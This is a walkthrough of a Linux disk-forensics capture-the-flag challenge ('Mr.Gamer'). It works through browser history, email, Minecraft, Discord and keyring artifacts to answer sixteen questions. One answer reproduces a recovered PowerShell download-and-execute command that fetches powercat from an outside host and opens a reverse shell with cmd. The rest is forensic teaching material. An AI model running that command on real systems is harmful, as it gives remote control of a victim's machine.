This Linux image belongs to a user who likes to play video games, especially Minecraft, and communicates with friends. But is this user doing something they shouldn't be? We need to identify any anomaly behavior done by this user. Use your Linux forensics skills to solve the challenge!
Information
Category Name: Mr.Gamer
Files :Ā c77-linux.zip 14.55 GB
ā ā2022 CTF ā Linux.7zā 14.55 GB
Since the file is large, I recommend either sharing a folder with your VM or using an external drive.
Ā
My Recommendations
Download it from CyberDefenders and verify the file with sha1sum:
sha1sum /path/to/c77-linux.zip
SHA1: 62aa7c7d4fcd3f442365b1d7aa6b12a77e244627
This is my personal preference, I like being organized and deleting a folder when Iām done with it .
mkdir Documents/CyberDefenders/Gamer && cd Documents/CyberDefenders/Gamer
sudo ewfmount /path/to/LenovoFinal.E01 /mnt/ewf sudo mount -o ro,noload,offset=537919488 /mnt/ewf/ewf1 /mnt/Linux
Ā
Walkthrough
1: What is the name of the utility/library the user was looking at exploits for?
The question asks what the user is looking for, so we can take a look at Browser History:
sudo find /mnt/Linux -name "places.sqlite" -o -name "History"
Which returns two places.sqlite databases, one for firefox, one for ThunderBird:
We can copy both, although Iām sure the information is in the Firefox history:
cp /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/places.sqlite thunderbird-places.sqlite
cp /mnt/Linux/home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite ff-places.sqlite
sqlite browser ff-places.sqlite
In the table moz_places, we can filter the url for google.com/search?. We will see that lots of hacking/exploit stuff was searched, but the user specifically looked for log4j exploits:
Answer: log4j
2: What is the version ID number of the operating system on the machine?
Looking at /etc/issue:
cat /mnt/Linux/etc/issue
Answer: 21.10
3: What is the hostname of the computer?
We can find this information in /etc/hosts:
cat /mnt/Linux/etc/hosts
Ā
Ā
Answer:Ā rshell-lenovo
4: What is one anime that the user likes?
The Question Title is A little blue birdie told me, so obviously it refers to Twitter. We can grep for both strings in Rafaelās directory to identify potential files.
grep -r -i 'anime' /mnt/Linux/home/rafael | grep -i twitter
All the links in the Inbox are basically the same, for a status of Anime account.Ā Now, grepping for the exact link:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'https://twitter.com/AnimeShots___/status/148959235968=' -B 10 -A 10
To validate this, we can grep for āAttack On Titanā:
grep -r -s -l -F 'Attack On Titan' /mnt/Linux
Outside the thunderbird directory, there is a match at ānotificationstore.jsonā in Firefox:
The fact that rafael received a notification for this topic pretty much confirms his luuuv for Attack On Titan.
Answer: Attack on Titan
5: What is the UUID for the attacker's Minecraft account?
There is .minecraft folder in the userās directory. The playerās information can be found in usercache.json:
jq . /mnt/Linux/home/rafael/.minecraft/usercache.json
Answer: 8b0dec19-b463-477e-9548-eef20c861492
6: What VPN client did the user install and use on the machine?
Looking at the dpkg.log, zerotier-one was installed on the machine:
cat /mnt/Linux/var/log/dpkg.log | grep -F 'status installed' | sed 's/^.*status installed //g' | sort | uniq
On top of that, Firefox History shows that the user searched for ZeroTier, Downloaded it and Signed in :
Answer: zerotier
7: What was the user's first password for the guest wifi?
Usually, a guest password is sent over email.
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5
The guest wifi is ChamplainGuest, and this is the ātemplateā email of when they send the credentials.
To find the first password, we need to find the oldest expiry date:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5 | grep -F 'Account expires'
The oldest date is Friday, January 28, 2022 17:01, we just need to search for that:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'Friday, January 28, 2022 17:01' -B 10
Answer: 093483
8: The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
In the Firefox places.sqlite database, I am using this SQL query to find the youtube url watched on February 9th:
select
moz_places.id as 'Id',
moz_places.url,
moz_places.title,
moz_places.description,
datetime(moz_historyvisits.visit_date/1000000,'unixepoch','localtime' ) as 'VisitDate'
FROM moz_places
left join moz_historyvisits on moz_historyvisits.place_id = moz_places.id
order by VisitDate desc
Then saving it as a View, and filtering the urls for youtube and the VisitDate for ā2022-02-09ā:
Ā
We can copy the links to a Browser and see Youtubeās information. Id 176 premiered on December 11th 2021. There is nothing in the wayback machine, but in Rafaelās Pictures directory there are three screenshots dated February 9th.
Looking at the three screenshots shows two different view counts. At 17:42 and 17:31 it had 265,355 views.
Ā
At 16:42 it had 265,342 views:
Ā
Itās unclear which value to submit, but the correct answer is for the 16:42 screenshot.
Answer: 265342
9: What is the new channel name for the YouTuber whose cookbook is shown on the device?
In rafaelās User directory, there is a folder named āmarshalsecā which contains the all things related to the log4j exploit. The folder poc contains screenshots, we can bulk open them by doing:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file aaGkBJdu.jpeg contains a screenshot (?) with a cookbook for Binging with Babish:
Searching for it in Youtube, shows the challen name is Babish Culinary Universe:
Answer: Babish Culinary Universe
10: What is the module with the highest installed version for the chat application with the mascot Wumpus?
The chat application in question is Discord. We can check its directory to identify potential files:
ls -la /mnt/Linux/home/rafael/.config/discord
The first directory, 0.0.16, is the āversionā directory, and it contains a file named āinstalled.jsonā which we can check for installation information:
jq . /mnt/Linux/home/rafael/.config/discord/0.0.16/modules/installed.json
The highest installed version is for the discord_voice module:
Answer: discord_voice
11: According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
This question is related to the screenshots in the marshalsec/poc directory. Now, itās obvious that these screenshots were taken on the Victimās machine. Using the same command as before to bulk open the images:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file marshalsec/poc/YXvySdGd.jpeg matches the timestamp:
The temperature was 45 ĀŗF.
Answer: 45F
12: What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?
Looking at the Downloads directory, there is a .wav file:
ls -la /mnt/Linux/home/rafael/Downloads
We can use exiftool to find out from where it was downloaded:
exiftool /mnt/Linux/home/rafael/Downloads/'Rick Astley - Never Gonna Give You Up (Official Music Video).wav'
Opening the link in a browser, and looking at Rick Astleyās upload history, the second video was āWhenever You Need Somebodyā :
Which was uploaded on October 25th, 2009:
Answer: 10/25/2009
Ā
13. What is the SHA-1 hash of Minecraft's "latest" release according to the system?
This question literally took me YEARS to solve. In the .minecraft/versions directory there is a file named āversion_manifest_v2.jsonā
jq . /mnt/Linux/home/rafael/.minecraft/versions/version_manifest_v2.json
The first element shows the latest release as ā1.18.1ā and the snapshot as ā22w06aā:
For some reason I was convinced that the hashes in the file were irrelevant, as they were hashes to json files and not the actual āexecutable/releaseā. So I spent lots of time looking up and trying all sorts of hashes related to this specific version. However, the correct answer was right under my eyes šš.
Answer: 3c6e119c0ff307accf31b596f9cd47ffa2ec6305
14: What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was "powercat -D Y -l a -n," the answer would be "-D Y -l a -n")
In the marshalsec/poc/ there is a powercat.ps1 file, however no real evidence of execution exists. We can grep the entire partition for the filename:
sudo grep -r -s -l -F 'powercat.ps1' /mnt/Linux
#returns /mnt/Linux/swapfile and /mnt/Linux/home/rafael/.bash_history
strings /mnt/Linux/home/rafael/.bash_history | grep powercat -B 5 -A 5
The bash history shows only evidence of the script being Downloaded:
We can check the swapfile:
sudo strings -a -td -el /mnt/Linux/swapfile | grep 'powercat' -B 5 -A 5
and here is the full command:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.191.253:8000/powercat.ps1');powercat -c 192.168.191.253 -p 4444 -e cmd"
Answer: -c 192.168.191.253 -p 4444 -e cmd
15: How many dimensions (including the overworld) did the player travel to in the "oldest of the worlds"?
Another question I spent hours on since I know nothing about Minecraft š.
The three ādimensionsā in minecraft are the Overworld, the Nether, and the End. First, letās identify the āoldest of the worldsā. The āworldsā of the players are saved under āsavesā:
ls -la /mnt/Linux/home/rafael/.minecraft/saves
So the āworldā is āNew Worldā. Then, I did everything possible. I extracted the .mca files, parsed the .dat files but nothing. So I used the hints which pointed to the āadvancementsā. The directory contains only one file: 8b0dec19-b463-477e-9548-eef20c861492.json. A little google took me here.
Essentially, if the user traveled to the end or the nether, the advancement would start with āminecraft:netherā or āminecraft:endā. So we can check the json file for minecraft and see the list of advancements:
jq . /mnt/Linux/home/rafael/.minecraft/saves/'New World'/advancements/8b0dec19-b463-477e-9548-eef20c861492.json | grep minecraft -B 1
None of these are āendā or ānetherā, so the user must have stayed in the Overworld.
Answer: one
16: What is the mojangClientToken stored in the Keystore?
This one took time, but actually, given that the key (Matrix_1999) is provided it was way easier than I thought.
First, letās find the keystore:
sudo find /mnt/Linux -name "*.keystore"
#returns /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore
Then, I copied rafaelās keystore to my keyrings directory and change its name:
cp /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore /home/remnux/.local/share/keyrings/rafael.keystore
I then opened the āPasswords and Keysā app on my machine. A new āLoginā tab was there, so I unlocked it with the password Matrix_1999:
Double clicked on the mojangClientToken, and selected copy (the password is hidden) and pasted it in Terminal to get its value, which is 2f76c8b04c004ddd888a05a6cad6be52.
Answer: 2f76c8b04c004ddd888a05a6cad6be52
TLDR
Just a boy playing around with Log4j
